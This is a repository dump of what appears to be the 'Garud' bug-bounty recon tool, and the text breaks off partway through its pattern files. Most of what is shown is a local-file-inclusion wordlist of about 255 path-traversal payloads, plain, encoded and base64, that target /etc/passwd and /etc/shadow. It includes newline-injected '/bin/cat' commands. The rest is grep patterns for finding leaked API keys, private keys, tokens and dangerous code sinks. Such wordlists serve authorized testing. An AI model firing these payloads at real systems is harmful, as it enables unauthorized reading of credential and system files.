├── .dockerignore ├── .github ├── FUNDING.yml ├── contributors.md ├── img │ ├── garud.png │ ├── mindmap.png │ ├── roadmap.png │ └── support.svg ├── payloads │ ├── lfi.txt │ ├── patterns │ │ ├── asymmetric-keys_secrets.json │ │ ├── auth.json │ │ ├── aws-keys.json │ │ ├── aws-keys_secrets.json │ │ ├── aws-s3_secrets.json │ │ ├── badwords.json │ │ ├── base64.json │ │ ├── ccode.json │ │ ├── cors.json │ │ ├── crypto.json │ │ ├── debug-pages.json │ │ ├── debug_logic.json │ │ ├── execs.json │ │ ├── facebook-oauth_secrets.json │ │ ├── facebook-token_secrets.json │ │ ├── firebase.json │ │ ├── firebase_secrets.json │ │ ├── fw.json │ │ ├── github_secrets.json │ │ ├── go-functions.json │ │ ├── google-keys_secrets.json │ │ ├── google-oauth_secrets.json │ │ ├── google-service-account_secrets.json │ │ ├── google-token_secrets.json │ │ ├── heroku-keys_secrets.json │ │ ├── http-auth.json │ │ ├── idor.json │ │ ├── img-traversal.json │ │ ├── interestingEXT.json │ │ ├── interestingparams.json │ │ ├── interestingsubs.json │ │ ├── ip.json │ │ ├── json-sec.json │ │ ├── jsvar.json │ │ ├── jwt.json │ │ ├── lfi.json │ │ ├── mailchimp-keys_secrets.json │ │ ├── mailgun-keys_secrets.json │ │ ├── meg-headers.json │ │ ├── parsers.json │ │ ├── paypal-token_secrets.json │ │ ├── php-curl.json │ │ ├── php-errors.json │ │ ├── php-serialized.json │ │ ├── php-sinks.json │ │ ├── php-sources.json │ │ ├── picatic-keys_secrets.json │ │ ├── rce.json │ │ ├── redirect.json │ │ ├── s3-buckets.json │ │ ├── sec.json │ │ ├── secrets.json │ │ ├── serial.json │ │ ├── servers.json │ │ ├── slack-token_secrets.json │ │ ├── slack-webhook_secrets.json │ │ ├── sqli.json │ │ ├── square-keys_secrets.json │ │ ├── ssrf.json │ │ ├── ssti.json │ │ ├── strings.json │ │ ├── stripe-keys_secrets.json │ │ ├── swearwords.json │ │ ├── takeovers.json │ │ ├── twilio-keys_secrets.json │ │ ├── twitter-oauth_secrets.json │ │ ├── twitter-token_secrets.json │ │ ├── upload-fields.json │ │ ├── urls.json │ │ ├── xml.json │ │ └── xss.json │ └── 
ssti.txt └── workflows │ └── push-to-docker.yml ├── Dockerfile ├── LICENSE ├── README.md ├── garud └── install.sh /.dockerignore: -------------------------------------------------------------------------------- 1 | Dockerfile -------------------------------------------------------------------------------- /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | # These are supported funding model platforms 2 | ko_fi: R0X4R 3 | custom: ['https://pmny.in/bIKNZngt4ys1', 'https://www.buymeacoffee.com/R0X4R', 'https://www.paypal.com/paypalme/r0x4r'] -------------------------------------------------------------------------------- /.github/contributors.md: -------------------------------------------------------------------------------- 1 | ## **Thanks to the heroes** 2 | 3 | --- 4 | Many people have contributed to **Garud**, making it a wonderful tool, by making pull requests that fix things. Here, I recognize these people and thank them. 5 | 6 |
7 | 8 | | Avatar | Username | Name| 9 | |------|------|-----| 10 | |
| [`@frost19k`](https://github.com/frost19k) | **Maaz Basar** | 11 | |
| [`@KathanP19`](https://github.com/KathanP19) | **Kathan Patel** | 12 | |
| [`@f8al`](https://github.com/f8al) | **SecurityShrimp** | 13 | |
| [`@hangyakuzero`](https://github.com/hangyakuzero) | **maharshi** | 14 | |
| [`@simrotion13`](https://github.com/simrotion13) | **Simba Gill** | 15 | |
| [`@theamanrawat`](https://github.com/theamanrawat) | **Aman Rawat** | -------------------------------------------------------------------------------- /.github/img/garud.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R0X4R/Garud/58b81f6abad2fce2add9e5f020025e887a63f596/.github/img/garud.png -------------------------------------------------------------------------------- /.github/img/mindmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R0X4R/Garud/58b81f6abad2fce2add9e5f020025e887a63f596/.github/img/mindmap.png -------------------------------------------------------------------------------- /.github/img/roadmap.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/R0X4R/Garud/58b81f6abad2fce2add9e5f020025e887a63f596/.github/img/roadmap.png -------------------------------------------------------------------------------- /.github/img/support.svg: -------------------------------------------------------------------------------- 1 | 2 | New Project 3 | 4 | 5 | 6 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /.github/payloads/lfi.txt: -------------------------------------------------------------------------------- 1 | /etc/passwd 2 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd 3 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd 4 | ../../../../../../../../../../../../../../../../../../../../etc/passwd 5 | ../../../../../../../../../../../../../../../../../../../etc/passwd 6 | ../../../../../../../../../../../../../../../../../../etc/passwd 7 | ../../../../../../../../../../../../../../../../../etc/passwd 8 | ../../../../../../../../../../../../../../../../etc/passwd 9 | ../../../../../../../../../../../../../../../etc/passwd 10 | 
../../../../../../../../../../../../../../etc/passwd 11 | ../../../../../../../../../../../../../etc/passwd 12 | ../../../../../../../../../../../../etc/passwd 13 | ../../../../../../../../../../../etc/passwd 14 | ../../../../../../../../../../etc/passwd 15 | ../../../../../../../../../etc/passwd 16 | ../../../../../../../../etc/passwd 17 | ../../../../../../../etc/passwd 18 | ../../../../../../etc/passwd 19 | ../../../../../etc/passwd 20 | ../../../../etc/passwd 21 | ../../../etc/passwd 22 | ../../etc/passwd 23 | ../etc/passwd 24 | ..\..\..\..\..\..\..\..\..\..\etc\passwd 25 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd 26 | \..\..\..\..\..\..\..\..\..\..\etc\passwd 27 | etc/passwd 28 | /etc/passwd%00 29 | /e?c/pa??wd 30 | ../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 31 | ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00 32 | ../../../../../../../../../../../../../../../../../../../../etc/passwd%00 33 | ../../../../../../../../../../../../../../../../../../../etc/passwd%00 34 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 35 | ../../../../../../../../../../../../../../../../../etc/passwd%00 36 | ../../../../../../../../../../../../../../../../etc/passwd%00 37 | ../../../../../../../../../../../../../../../etc/passwd%00 38 | ../../../../../../../../../../../../../../etc/passwd%00 39 | ../../../../../../../../../../../../../etc/passwd%00 40 | ../../../../../../../../../../../../etc/passwd%00 41 | ../../../../../../../../../../../etc/passwd%00 42 | ../../../../../../../../../../etc/passwd%00 43 | ../../../../../../../../../etc/passwd%00 44 | ../../../../../../../../etc/passwd%00 45 | ../../../../../../../etc/passwd%00 46 | ../../../../../../etc/passwd%00 47 | ../../../../../etc/passwd%00 48 | ../../../../etc/passwd%00 49 | ../../../etc/passwd%00 50 | ../../etc/passwd%00 51 | ../etc/passwd%00 52 | %00../../../../../../etc/passwd 53 | %00/etc/passwd%00 54 | %00../../../../../../etc/shadow 
55 | %00/etc/shadow%00 56 | %0a/bin/cat%20/etc/passwd 57 | %0a/bin/cat%20/etc/shadow 58 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 59 | ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 60 | ..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed 61 | ..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd 62 | /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 63 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd 64 | /./././././././././././etc/passwd 65 | /../../../../../../../../../../etc/passwd 66 | /../../../../../../../../../../etc/passwd^^ 67 | /..\../..\../..\../..\../..\../..\../etc/passwd 68 | /etc/passwd 69 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00 70 | \..\..\..\..\..\..\..\..\..\..\etc\passwd%00 71 | /../../../../../../../../../../../etc/passwd%00.html 72 | /../../../../../../../../../../../etc/passwd%00.jpg 73 | ../../../../../../etc/passwd&=%3C%3C%3C%3C 74 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 75 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 76 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 77 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 78 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 79 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 80 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 81 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 82 | 
....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 83 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 84 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 85 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 86 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 87 | ....\/....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 88 | ....\/....\/....\/....\/....\/....\/....\/....\/etc/passwd 89 | ....\/....\/....\/....\/....\/....\/....\/etc/passwd 90 | ....\/....\/....\/....\/....\/....\/etc/passwd 91 | ....\/....\/....\/....\/....\/etc/passwd 92 | ....\/....\/....\/....\/etc/passwd 93 | ....\/....\/....\/etc/passwd 94 | ....\/....\/etc/passwd 95 | ....\/etc/passwd 96 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 97 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 98 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 99 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 100 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 101 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 102 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 103 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 104 | ....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 105 | 
....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 106 | ....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd 107 | ....//....//....//....//....//....//....//....//....//....//....//etc/passwd 108 | ....//....//....//....//....//....//....//....//....//....//etc/passwd 109 | ....//....//....//....//....//....//....//....//....//etc/passwd 110 | ....//....//....//....//....//....//....//....//etc/passwd 111 | ....//....//....//....//....//....//....//etc/passwd 112 | ....//....//....//....//....//....//etc/passwd 113 | ....//....//....//....//....//etc/passwd 114 | ....//....//....//....//etc/passwd 115 | ....//....//....//etc/passwd 116 | ....//....//etc/passwd 117 | ....//etc/passwd 118 | passwd 119 | /.passwd 120 | .passwd 121 | ../.passwd 122 | passwd.dat 123 | ..2fetc2fpasswd 124 | ..2fetc2fpasswd%00 125 | ..2f..2fetc2fpasswd 126 | ..2f..2fetc2fpasswd%00 127 | ..2f..2f..2fetc2fpasswd 128 | ..2f..2f..2fetc2fpasswd%00 129 | ..2f..2f..2f..2fetc2fpasswd 130 | ..2f..2f..2f..2fetc2fpasswd%00 131 | ..2f..2f..2f..2f..2fetc2fpasswd 132 | ..2f..2f..2f..2f..2fetc2fpasswd%00 133 | ..2f..2f..2f..2f..2f..2fetc2fpasswd 134 | ..2f..2f..2f..2f..2f..2fetc2fpasswd%00 135 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 136 | ..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 137 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 138 | ..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 139 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 140 | ..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 141 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 142 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 143 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 144 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 145 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 146 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 147 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 
148 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 149 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 150 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 151 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 152 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 153 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 154 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 155 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 156 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 157 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 158 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 159 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 160 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 161 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 162 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 163 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 164 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 165 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd 166 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00 167 | ..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00 168 | L2V0Yy9tYXN0ZXIucGFzc3dk 169 | L21hc3Rlci5wYXNzd2Q= 170 | ZXRjL3Bhc3N3ZA== 171 | ZXRjL3NoYWRvdyUwMA== 172 | L2V0Yy9wYXNzd2Q= 173 | L2V0Yy9wYXNzd2QlMDA= 174 | 
Li4vZXRjL3Bhc3N3ZA== 175 | Li4vZXRjL3Bhc3N3ZCUwMA== 176 | Li4vLi4vZXRjL3Bhc3N3ZA== 177 | Li4vLi4vZXRjL3Bhc3N3ZCUwMA== 178 | Li4vLi4vLi4vZXRjL3Bhc3N3ZA== 179 | Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 180 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 181 | Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 182 | Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 183 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 184 | Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 185 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 186 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 187 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 188 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 189 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 190 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 191 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 192 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 193 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 194 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 195 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 196 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 197 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 198 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 199 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 200 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 201 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 202 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 203 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 204 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 205 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 206 | 
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 207 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 208 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 209 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 210 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 211 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 212 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 213 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 214 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 215 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== 216 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA== 217 | Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA== 218 | /etc/passwd 219 | ../etc/passwd 220 | ../../etc/passwd 221 | ../../../etc/passwd 222 | ../../../../etc/passwd 223 | ../../../../../etc/passwd 224 | ../../../../../../etc/passwd 225 | ../../../../../../../etc/passwd 226 | ../../../../../../../../etc/passwd 227 | ../../../../../../../../../etc/passwd 228 | ../../../../../../../../../../etc/passwd 229 | ../../../../../../../../../../../etc/passwd 230 | ../../../../../../../../../../../../etc/passwd 231 | ../../../../../../../../../../../../../etc/passwd 232 | ../../../../../../../../../../../../../../etc/passwd 233 | ../../../../../../../../../../../../../../../etc/passwd 234 | ../../../../../../../../../../../../../../../../etc/passwd 235 | 
../../../../../../../../../../../../../../../../../etc/passwd 236 | ../../../../../../../../../../../../../../../../../../etc/passwd 237 | /etc/passwd%00 238 | ../etc/passwd%00 239 | ../../etc/passwd%00 240 | ../../../etc/passwd%00 241 | ../../../../etc/passwd%00 242 | ../../../../../etc/passwd%00 243 | ../../../../../../etc/passwd%00 244 | ../../../../../../../etc/passwd%00 245 | ../../../../../../../../etc/passwd%00 246 | ../../../../../../../../../etc/passwd%00 247 | ../../../../../../../../../../etc/passwd%00 248 | ../../../../../../../../../../../etc/passwd%00 249 | ../../../../../../../../../../../../etc/passwd%00 250 | ../../../../../../../../../../../../../etc/passwd%00 251 | ../../../../../../../../../../../../../../etc/passwd%00 252 | ../../../../../../../../../../../../../../../etc/passwd%00 253 | ../../../../../../../../../../../../../../../../etc/passwd%00 254 | ../../../../../../../../../../../../../../../../../etc/passwd%00 255 | ../../../../../../../../../../../../../../../../../../etc/passwd%00 -------------------------------------------------------------------------------- /.github/payloads/patterns/asymmetric-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "\\-\\-\\-\\-\\-BEGIN ((EC|PGP|DSA|RSA|OPENSSH) )?PRIVATE KEY( BLOCK)?\\-\\-\\-\\-\\-" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/auth.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(privilege|permissions|capability|role|rbac|policy|authorization|auth|claims|access|login|register|registration|logout)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/aws-keys.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanE", 3 | 
"pattern": "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/aws-keys_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/aws-s3_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "[a-z0-9.-]+\\.s3\\.amazonaws\\.com", 5 | "[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com", 6 | "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)", 7 | "//s3\\.amazonaws\\.com/[a-z0-9._-]+", 8 | "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+" 9 | ] 10 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/badwords.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(TODO|FIXME|ISSUE|TEMPORARY FIX|TEMPORARY HACK|WORKAROUND|BE CAREFUL|SENSITIVE|LEGACY|RAW|DANGEROUS|INSECURE|UNSAFE)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/base64.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HnoE", 3 | "pattern": "([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}" 4 | } 5 | 6 | 7 | -------------------------------------------------------------------------------- /.github/payloads/patterns/ccode.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(alloc|free|strcpy|gets|strncpy|strcat|sprintf|scanf)" 4 | } 5 | 
-------------------------------------------------------------------------------- /.github/payloads/patterns/cors.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HniE", 3 | "patterns": [ 4 | "Access-Control-Allow" 5 | ] 6 | } 7 | -------------------------------------------------------------------------------- /.github/payloads/patterns/crypto.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanriE", 3 | "pattern": "(aes|rsa|dsa|des|cbc|ecb|hmac|gcm|privatekey|publickey|md5|sha1|sha256|cipher|crypto|encrypt|decrypt|digest)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/debug-pages.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HnaiE", 3 | "pattern": "(Application-Trace|Routing Error|DEBUG\"? ?[=:] ?True|Caused by:|stack trace:|Microsoft .NET Framework|Traceback|[0-9]:in `|#!/us|WebApplicationException|java\\.lang\\.|phpinfo|swaggerUi|on line [0-9]|SQLSTATE)" 4 | 5 | } 6 | -------------------------------------------------------------------------------- /.github/payloads/patterns/debug_logic.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-iE", 3 | "patterns": [ 4 | 5 | "access=", 6 | "admin=", 7 | "dbg=", 8 | "debug=", 9 | "edit=", 10 | "grant=", 11 | "test=", 12 | "alter=", 13 | "clone=", 14 | "create=", 15 | "delete=", 16 | "disable=", 17 | "enable=", 18 | "exec=", 19 | "execute=", 20 | "load=", 21 | "make=", 22 | "modify=", 23 | "rename=", 24 | "reset=", 25 | "shell=", 26 | "toggle=", 27 | "adm=", 28 | "root=", 29 | "cfg=", 30 | "config=" 31 | ] 32 | } 33 | -------------------------------------------------------------------------------- /.github/payloads/patterns/execs.json: -------------------------------------------------------------------------------- 1 | { 
2 | "flags": "-HanriE", 3 | "pattern": "(eval|run|exec|process|system|popen|spawn|dup2)" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/facebook-oauth_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "facebook.*['|\"][0-9a-f]{32}['|\"]" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/facebook-token_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "pattern": "EAACEdEose0cBA[0-9A-Za-z]+" 4 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/firebase.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-Hni", 3 | "pattern": "firebaseio.com" 4 | } 5 | -------------------------------------------------------------------------------- /.github/payloads/patterns/firebase_secrets.json: -------------------------------------------------------------------------------- 1 | { 2 | "flags": "-HanrEo", 3 | "patterns": [ 4 | "[a-z0-9.-]+\\.firebaseio\\.com", 5 | "[a-z0-9.-]+\\.firebaseapp\\.com", 6 | "[a-z0-9.-]+\\.appspot\\.com" 7 | ] 8 | } -------------------------------------------------------------------------------- /.github/payloads/patterns/fw.json: -------------------------------------------------------------------------------- 1 